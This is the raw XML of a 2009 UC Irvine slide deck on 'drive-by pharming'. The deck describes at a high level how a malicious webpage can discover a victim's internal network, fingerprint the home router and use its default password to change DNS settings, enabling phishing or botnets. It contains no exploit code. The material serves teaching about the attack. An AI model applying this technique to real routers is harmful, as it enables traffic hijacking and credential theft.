              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>- Technical Director of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0"/>
              <a:t>Symantec Security</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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6019800" y="4343400"/>
            <a:ext cx="265970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Prof. Markus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Jacobsson</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Indiana University</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> Principal Scientist </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>at Palo Alto RC</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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Anh Le - UC Irvine - 2009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926" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Introduction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Preliminaries and Previous Work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Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pharming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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Demo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New Attacks and Recent Events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Conclusion and Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926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Anh Le - UC Irvine - 2009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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.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Motivation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Total control of home broadband routers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/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Phishing (by changing DNS setting)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (by changing firmware)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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How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Attacker sets up an “evil” webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim visits the evil webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Victim’s home router is compromised</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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No physical proximity required</a:t>
            </a:r>
            <a:b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endParaRPr lang="en-US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solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enablers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JavaScript-enabled web browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Default password management of the routers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Anh Le - UC Irvine - 2009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2a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Preliminaries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DNS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Domain Name System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WU9QWPQ\MCj0424192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276600"/>
            <a:ext cx="1955800" cy="1606550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="Picture 5" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1HE85B9A\MCj0424770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3200400"/>
            <a:ext cx="1450975" cy="1873250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="3886200"/>
            <a:ext cx="35052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3200400" y="4648200"/>
            <a:ext cx="35052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581400" y="3505200"/>
            <a:ext cx="24599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What’s IP of yahoo.com?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52800" y="4724400"/>
            <a:ext cx="3154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</a:rPr>
              <a:t>yahoo.com’s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 IP is 206.190.60.37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47800" y="5029200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858000" y="5181600"/>
            <a:ext cx="1582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DNS server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(home router)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Anh Le - UC Irvine - 2009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2a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Preliminaries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Phishing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 type of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social engineering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack to obtain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access credentials</a:t>
            </a:r>
            <a:b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endParaRPr lang="en-US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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pharming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An attack aiming to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redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> a website's traffic to another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bogus website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Anh Le - UC Irvine - 2009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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3352800"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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733800" y="3352800"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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5867400" y="2209800"/>
            <a:ext cx="1524000" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx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019800" y="3352800"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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943599" y="3429000"/>
            <a:ext cx="1752601" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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2b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Previous Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051" name="Picture 3" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WU9QWPQ\MCj0424192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1600200"/>
            <a:ext cx="1213678" cy="996950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Cloud"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2743200"/>
            <a:ext cx="1821694" cy="12207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Internet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5" name="Picture 7" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WU9QWPQ\MCj0424194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2895600"/>
            <a:ext cx="744957" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 7" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WU9QWPQ\MCj0424194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4419600"/>
            <a:ext cx="744957" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="2514600"/>
            <a:ext cx="1524000" cy="1549400"/>
            <a:chOff x="533400" y="2667000"/>
            <a:chExt cx="1752600" cy="1778000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2058" name="Picture 10" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04247900000[1].wmf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33400" y="2667000"/>
              <a:ext cx="1708150" cy="1778000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2057" name="Picture 9" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04238480000[1].wmf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447800" y="3429000"/>
              <a:ext cx="838200" cy="920839"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2059" name="Picture 11" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8V8M1IJD\MCj03984990000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57800" y="2667000"/>
            <a:ext cx="1261065" cy="1158875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2313774" y="2345108"/>
            <a:ext cx="4537817" cy="752030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4537817 w 4537817"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 752030"/>
              <a:gd name="connsiteX1" fmla="*/ 3401226 w 4537817"/>
              <a:gd name="connsiteY1" fmla="*/ 752030 h 752030"/>
              <a:gd name="connsiteX2" fmla="*/ 3401226 w 4537817"/>
              <a:gd name="connsiteY2" fmla="*/ 752030 h 752030"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4537817"/>
              <a:gd name="connsiteY3" fmla="*/ 743485 h 752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37817" h="752030">
                <a:moveTo>
                  <a:pt x="4537817" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3401226" y="752030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3401226" y="752030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="743485"/>
                </a:ln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ular Callout 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1676400"/>
            <a:ext cx="3733800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -28688"/>
              <a:gd name="adj2" fmla="val 67484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Detecting … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>… Your internal subnet is10.0.0.0/24!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="50292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533400" y="4267200"/>
            <a:ext cx="48141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accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal Net Discovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Kindermann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2003]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Java Applet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533400" y="4953000"/>
            <a:ext cx="550663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en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host Scanning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[Grossman 2006, SPI Labs 2006]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Java Script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dirty="0" smtClean="0"/>
              <a:t>Fingerprint router using default </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password and image name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62" name="Rounded Rectangular Callout 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1676400"/>
            <a:ext cx="4953000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -31832"/>
              <a:gd name="adj2" fmla="val 63989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Detecting … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>… You have a Linksys router, and its IP is 10.0.0.1!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600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Anh Le - UC Irvine - 2009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8" grpId="0" animBg="1"/>
      <p:bldP spid="58" grpId="1" animBg="1"/>
      <p:bldP spid="60" grpId="0"/>
      <p:bldP spid="61" grpId="0"/>
      <p:bldP spid="6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926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Introduction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Preliminaries and Previous Work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Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pharming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="550926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Demo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New Attacks and Recent Events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Conclusion and Discussion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="550926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Anh Le - UC Irvine - 2009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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3352800"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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733800" y="3352800"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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5867400" y="2209800"/>
            <a:ext cx="1524000" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx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019800" y="3352800"/>
            <a:ext cx="2057400" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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943599" y="3429000"/>
            <a:ext cx="1752601" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="285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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. Drive-By </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Pharming</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051" name="Picture 3" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WU9QWPQ\MCj0424192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1600200"/>
            <a:ext cx="1213678" cy="996950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Cloud"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="2743200"/>
            <a:ext cx="1821694" cy="12207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Internet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5" name="Picture 7" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WU9QWPQ\MCj0424194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2895600"/>
            <a:ext cx="744957" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 7" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2WU9QWPQ\MCj0424194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4419600"/>
            <a:ext cx="744957" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838200" y="2514600"/>
            <a:ext cx="1524000" cy="1549400"/>
            <a:chOff x="533400" y="2667000"/>
            <a:chExt cx="1752600" cy="1778000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2058" name="Picture 10" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04247900000[1].wmf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33400" y="2667000"/>
              <a:ext cx="1708150" cy="1778000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2057" name="Picture 9" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj04238480000[1].wmf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447800" y="3429000"/>
              <a:ext cx="838200" cy="920839"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2059" name="Picture 11" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8V8M1IJD\MCj03984990000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57800" y="2667000"/>
            <a:ext cx="1261065" cy="1158875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2313774" y="2345108"/>
            <a:ext cx="4537817" cy="752030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 4537817 w 4537817"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 752030"/>
              <a:gd name="connsiteX1" fmla="*/ 3401226 w 4537817"/>
              <a:gd name="connsiteY1" fmla="*/ 752030 h 752030"/>
              <a:gd name="connsiteX2" fmla="*/ 3401226 w 4537817"/>
              <a:gd name="connsiteY2" fmla="*/ 752030 h 752030"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 4537817"/>
              <a:gd name="connsiteY3" fmla="*/ 743485 h 752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37817" h="752030">
                <a:moveTo>
                  <a:pt x="4537817" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3401226" y="752030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3401226" y="752030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="743485"/>
                </a:ln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1143000" y="50292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074" name="Picture 2" descr="C:\Users\Anh Le\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1A4IDG6A\MCj0423848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76400" y="3200400"/>
            <a:ext cx="679165" cy="746125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5105400" y="4114800"/>
            <a:ext cx="14542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DNS Setting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Changed!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Anh Le - UC Irvine - 2009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39579E-6 L 0.45833 3.39579E-6 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="13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23" grpId="0"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Technic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</TotalTime>
  <Words>472</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>141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Technic</vt:lpstr>
      <vt:lpstr>Drive-by Pharming</vt:lpstr>
      <vt:lpstr>Authors</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>1. Introduction</vt:lpstr>
      <vt:lpstr>2a. Preliminaries</vt:lpstr>
      <vt:lpstr>2a. Preliminaries (cont.)</vt:lpstr>
      <vt:lpstr>2b. Previous Work</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>3. Drive-By Pharming</vt:lpstr>
      <vt:lpstr>3. Drive-By Pharming</vt:lpstr>
      <vt:lpstr>3. Drive-By Pharming (cont.)</vt:lpstr>
      <vt:lpstr>3. Drive-By Pharming (cont.)</vt:lpstr>
      <vt:lpstr>4. Demo</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>5. New Attacks and Recent Events</vt:lpstr>
      <vt:lpstr>5. Conclusion and Discussion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Drive-by Pharming</dc:title>
  <dc:creator>Anh Le</dc:creator>
  <cp:lastModifiedBy>Anh Le</cp:lastModifiedBy>
  <cp:revision>32</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-04-13T03:33:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-04-13T16:42:42Z</dcterms:modified>
</cp:coreProperties>
</file>